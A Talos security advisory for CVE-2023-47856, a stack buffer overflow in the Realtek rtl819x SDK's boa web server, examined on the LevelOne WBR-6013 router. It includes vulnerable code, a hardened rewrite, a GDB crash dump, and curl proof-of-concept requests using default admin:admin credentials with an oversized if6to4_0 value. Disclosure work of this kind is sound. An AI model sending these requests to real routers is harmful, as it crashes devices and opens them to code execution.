CVSS3
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: HIGH
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
AI Score Confidence: High
EPSS Percentile: 17.4%
CVE-2023-47856
A stack-based buffer overflow vulnerability exists in the boa set_RadvdPrefixParam functionality of Realtek rtl819x Jungle SDK v3.4.11. A specially crafted series of network requests can lead to remote code execution. An attacker can send a sequence of requests to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
LevelOne WBR-6013 RER4_A_v3411b_2T2R_LEV_09_170623
Realtek rtl819x Jungle SDK v3.4.11
rtl819x Jungle SDK - <https://www.realtek.com/en/>
WBR-6013 - <https://www.level1.com/level1_en/wbr-6013-n300-wireless-router-54069103>
7.2 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CWE-121 - Stack-based Buffer Overflow
The WBR-6013 is a wireless router designed for home or office use. It boasts wireless speeds of up to 300Mbps. In order to enhance security, it provides network isolation by allowing up to 4 SSIDs and client isolation.
This Realtek rtl819x Jungle SDK vulnerability was found while researching the LevelOne WBR-6013 router. We are going to explain this vulnerability from the perspective of the WBR-6013 router.
The WBR-6013 router has a web server called boa. The version used in the device is the one shipped with a Realtek SDK that uses boa. One of the SDK's APIs is /boafrm/formRadvd. This API allows modifications of some parameters related to router advertisement. The function responsible for this API is boa's formRadvd:
void formRadvd(request *wp, char *path, char *query)
{
    [...]
    radvdCfgParam_t radvdCfgParam;
[1] getRadvdInfo(&radvdCfgParam);
    save_translation = get_correct_lang("Save");
    save_and_apply_translation = get_correct_lang("Save & Apply");
    get_correct_lang("Save & Apply");
[2] if((0 == strcmp(req_get_cstream_var(wp,"submit",""), save_translation))||(0 == strcmp(req_get_cstream_var(wp, ("save_apply"), ""), save_and_apply_translation)))
    {
        set_RadvdParam(wp, path, query, &radvdCfgParam);
    }
    [...]
}
The router advertisement information is fetched, at [1], into radvdCfgParam. The function then checks whether the request contains a submit or a save_apply parameter whose value satisfies the comparisons at [2]. If so, the set_RadvdParam function is called with the radvdCfgParam argument. If changes are required, they are applied to this struct variable and later committed to flash. Following is the set_RadvdParam function:
int set_RadvdParam(request *wp, char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
    [...]
    enable = atoi(req_get_cstream_var(wp, "enable_radvd", ""));
    [...]
    if(enable)
    {
        set_RadvdInterfaceParam(wp, path, query, pradvdCfgParam);
        set_RadvdPrefixParam(wp, path, query, pradvdCfgParam);
    }
    return 0;
}
This function fetches the enable_radvd request parameter; if its value is non-zero, the functions set_RadvdInterfaceParam and set_RadvdPrefixParam are called. Following is the set_RadvdPrefixParam function:
int set_RadvdPrefixParam(request *wp, char *path, char *query, radvdCfgParam_t *pradvdCfgParam)
{
    [...]
    for(j = 0; j < MAX_PREFIX_NUM; j++)
    {
        [...]
        sprintf(tmpname, "if6to4_%d", j);
[3]     tmpstr = req_get_cstream_var(wp, tmpname, "");
        if(strcmp(pradvdCfgParam->interface.prefix[j].if6to4, tmpstr))
        {
[4]         strcpy(pradvdCfgParam->interface.prefix[j].if6to4, tmpstr);
        }
    }
    return 0;
}
Here the struct pointed to by pradvdCfgParam, considering the code path shown above, resides in the stack frame of the formRadvd function. At [3] the if6to4_<j> request parameter is fetched and used at [4] to update, if necessary, the interface.prefix[j].if6to4 struct member of the pradvdCfgParam variable.
Because no checks are performed on the size of the if6to4_<j> request parameter string, a buffer overflow can occur at [4] in the stack variable radvdCfgParam in the formRadvd function. An attacker could exploit this vulnerability to achieve arbitrary code execution.
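As an added example, not code from the advisory or from the Realtek SDK: a hardened rewrite of the loop at [3]/[4] that length-checks every if6to4_<j> value against its destination before anything is written. The field width (16 bytes), MAX_PREFIX_NUM (4) and the key/value stub standing in for req_get_cstream_var are assumptions, since the advisory does not give the real struct layout.

```c
#include <stdio.h>
#include <string.h>
/* Illustrative sizes: the advisory does not give the real radvdCfgParam_t
 * field widths, so IF6TO4_LEN and MAX_PREFIX_NUM here are assumptions. */
#define MAX_PREFIX_NUM 4
#define IF6TO4_LEN 16
typedef struct { char if6to4[IF6TO4_LEN]; } radvd_prefix_t;
typedef struct { radvd_prefix_t prefix[MAX_PREFIX_NUM]; } radvdCfgParam_t;

/* Stand-in for boa's req_get_cstream_var(): a constructed key/value table
 * replaces the parsed POST body; a missing key yields "" as in the SDK. */
typedef struct { const char *key; const char *val; } kv_t;
static const char *get_var(const kv_t *v, size_t n, const char *key)
{
    for (size_t i = 0; i < n; i++) if (strcmp(v[i].key, key) == 0) return v[i].val;
    return "";
}

/* Hardened form of the loop at [3]/[4]: every if6to4_<j> value is checked
 * first, so one oversized value rejects the whole request and cfg is untouched. */
int set_RadvdPrefixParam_safe(const kv_t *v, size_t n, radvdCfgParam_t *cfg)
{
    char tmpname[32];
    const char *vals[MAX_PREFIX_NUM];
    for (int j = 0; j < MAX_PREFIX_NUM; j++) {
        snprintf(tmpname, sizeof tmpname, "if6to4_%d", j);
        vals[j] = get_var(v, n, tmpname);
        if (strlen(vals[j]) >= sizeof cfg->prefix[j].if6to4)
            return -1;                      /* would overflow: reject */
    }
    for (int j = 0; j < MAX_PREFIX_NUM; j++)
        if (strcmp(cfg->prefix[j].if6to4, vals[j]) != 0)
            memcpy(cfg->prefix[j].if6to4, vals[j], strlen(vals[j]) + 1);
    return 0;   /* same effect as the original strcpy path, minus the overflow */
}

/* Constructed requests: an in-range value is applied, an oversized
 * if6to4_0 (32 bytes into a 16-byte field) is rejected without any write. */
int demo_accepts_short(void)
{
    radvdCfgParam_t cfg = {0};
    kv_t req[] = { {"enable_radvd", "1"}, {"if6to4_0", "eth1"} };
    return set_RadvdPrefixParam_safe(req, 2, &cfg) == 0 && strcmp(cfg.prefix[0].if6to4, "eth1") == 0;
}
int demo_rejects_long(void)
{
    radvdCfgParam_t cfg = {0};
    kv_t req[] = { {"if6to4_0", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} };
    return set_RadvdPrefixParam_safe(req, 1, &cfg) == -1 && cfg.prefix[0].if6to4[0] == '\0';
}
```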
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────── registers ────
$zero: 0x00000000 → 0x00000000
$at  : 0xfffffff8 → 0xfffffff8
$v0  : 0x0000003d → 0x0000003d
$v1  : 0x00000446 → 0x00000446
$a0  : 0x004c5cc4 → 0x5454502d → 0x5454502d ("TTP-"?)
$a1  : 0x407ffae1 → 0x00000000 → 0x00000000
$a2  : 0x00000000 → 0x00000000
$a3  : 0x00000000 → 0x00000000
$t0  : 0x0000003e → 0x0000003e
$t1  : 0xbf80055c → 0xbf80055c
$t2  : 0x00000002 → 0x00000002
$t3  : 0x00000200 → 0x00000200
$t4  : 0x00000100 → 0x00000100
$t5  : 0x00000807 → 0x00000807
$t6  : 0x00000800 → 0x00000800
$t7  : 0x004b0000 → 0x004b0000
$s0  : 0x41414141 → 0x41414141 ("AAAA"?)
$s1  : 0x41414141 → 0x41414141 ("AAAA"?)
$s2  : 0x41414141 → 0x41414141 ("AAAA"?)
$s3  : 0x41414141 → 0x41414141 ("AAAA"?)
$s4  : 0x41414141 → 0x41414141 ("AAAA"?)
$s5  : 0x41414141 → 0x41414141 ("AAAA"?)
$s6  : 0x00000004 → 0x00000004
$s7  : 0x00449638 → 0x666f726d → 0x666f726d ("form"?)
$t8  : 0x004b56c0 → 0x3ff44400 → 0x28c80008 → 0x28c80008
$t9  : 0x3ff44400 → 0x28c80008 → 0x28c80008
$k0  : 0x00000000 → 0x00000000
$k1  : 0x00000000 → 0x00000000
$s8  : 0x0000005c → 0x0000005c
$pc  : 0x41414141 → 0x41414141 ("AAAA"?)
$sp  : 0x408004e0 → 0x41414141 → 0x41414141 ("AAAA"?)
$hi  : 0x00000004 → 0x00000004
$lo  : 0x0006a280 → 0x0006a280
$fir : 0x00739300 → 0x00739300
$ra  : 0x41414141 → 0x41414141 ("AAAA"?)
$gp  : 0x3ff875c0 → 0x6c5f636f → 0x6c5f636f ("l_co"?)
──────────────────────────────────────────────────────────────── stack ────
0x408004e0│+0x0000: 0x41414141 → 0x41414141 ← $sp
0x408004e4│+0x0004: 0x41414141 → 0x41414141
0x408004e8│+0x0008: 0x41414141 → 0x41414141
0x408004ec│+0x000c: 0x41414141 → 0x41414141
0x408004f0│+0x0010: 0x41414141 → 0x41414141
0x408004f4│+0x0014: 0x41414141 → 0x41414141
0x408004f8│+0x0018: 0x41414141 → 0x41414141
0x408004fc│+0x001c: 0x004c28d0 → 0x00000005 → 0x00000005
──────────────────────────────────────────────────── code:mips:MIPS32 ────
[!] Cannot disassemble from $PC
[!] Cannot access memory at address 0x41414140
────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0x41414141 in ?? (), reason: SIGSEGV
To use a specific API of the web server, because of a CSRF protection mechanism, it is first necessary to load the HTML page that would call that API:
curl --user admin:admin http://<DEVICE_IP>/radvd.htm &>/dev/null
After this request it is possible to use the /boafrm/formRadvd API:
curl -d "submit=Save&enable_radvd=1&submit-url=POC&if6to4_0=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" -X POST -H "Content-Type: application/x-www-form-urlencoded" --user admin:admin http://<DEVICE_IP>/boafrm/formRadvd
After the request the boa process will crash. The POC uses the default admin credentials.
Realtek has provided updated software to their customers. LevelOne has declined to patch the issues in their software.
2023-12-14 - Initial Vendor Contact
2023-12-22 - Vendor Disclosure
2024-05-20 - Vendor Patch Release
2024-07-08 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.